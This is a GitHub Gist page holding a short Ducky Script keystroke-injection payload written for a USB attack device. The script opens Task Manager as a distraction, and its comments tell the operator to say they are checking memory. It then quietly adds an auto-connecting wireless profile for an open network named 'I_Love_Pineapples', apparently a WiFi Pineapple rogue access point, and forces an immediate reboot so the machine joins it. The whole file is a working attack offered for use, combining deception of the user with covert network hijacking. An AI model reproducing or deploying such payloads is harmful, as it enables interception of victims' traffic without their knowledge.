Created
April 18, 2018 02:41
-
-
Save JonnyBanana/7af8199fc3c73537f9b9b46cc7dc1ebc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DEFAULT_DELAY 200 | |
ESC | |
ESC | |
REM opens task manager for a distraction | |
REM tell user you are checking memory or somthing | |
GUI r | |
STRING taskmgr | |
ENTER | |
ALT SPACE | |
STRING X | |
TAB | |
TAB | |
TAB | |
TAB | |
LEFT | |
LEFT | |
REM opens network manager | |
CTRL ESC | |
STRING Manage Wireless Networks | |
ENTER | |
TAB | |
TAB | |
TAB | |
TAB | |
ENTER | |
ENTER | |
REM creates ap association | |
STRING I_Love_Pineapples | |
TAB | |
DOWN | |
TAB | |
SPACE | |
TAB | |
SPACE | |
ENTER | |
ESC | |
ALT F4 | |
CTRL ESC | |
REM reboots for autoconnect to pineapple | |
GUI r | |
STRING Shutdown.exe -r -t 00 | |
ENTER |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment